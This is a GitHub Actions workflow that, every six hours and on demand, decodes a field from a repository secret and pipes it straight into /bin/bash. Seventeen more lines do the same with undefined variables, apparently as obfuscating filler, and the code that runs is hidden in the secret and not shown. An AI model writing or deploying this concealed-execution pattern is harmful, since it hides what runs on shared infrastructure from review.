name: zhebuzhudefenhua
on:
  workflow_dispatch:
  schedule:
    - cron: '56 4/6 * * *'
jobs:  # 14893
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhebuzhudefenhua
        env:
          i9: ${{ secrets.i9 }}
        run: |
          echo $i9 | jq -r .mmw540 | /bin/bash
          echo $sknyo91624 | jq -r .jx941 | /bin/bash
          echo $phs64738 | jq -r .dcwm135 | /bin/bash
          echo $yh4102 | jq -r .z87776 | /bin/bash
          echo $uwc42191 | jq -r .i8 | /bin/bash
          echo $cmo5441 | jq -r .yy28068 | /bin/bash
          echo $toje2369 | jq -r .y7316 | /bin/bash
          echo $hoq3 | jq -r .vhh242 | /bin/bash
          echo $pmm08 | jq -r .pvdd6488 | /bin/bash
          echo $z0 | jq -r .acs6 | /bin/bash
          echo $fst5 | jq -r .iav97600 | /bin/bash
          echo $vdozb629 | jq -r .c9978 | /bin/bash
          echo $w23 | jq -r .odr5202 | /bin/bash
          echo $mhbf296 | jq -r .ofgo6381 | /bin/bash
          echo $qlcr183 | jq -r .sjye299 | /bin/bash
          echo $ofo1262 | jq -r .kl3 | /bin/bash
          echo $eh85 | jq -r .jqr7 | /bin/bash
          echo $zda2 | jq -r .rq07321 | /bin/bash

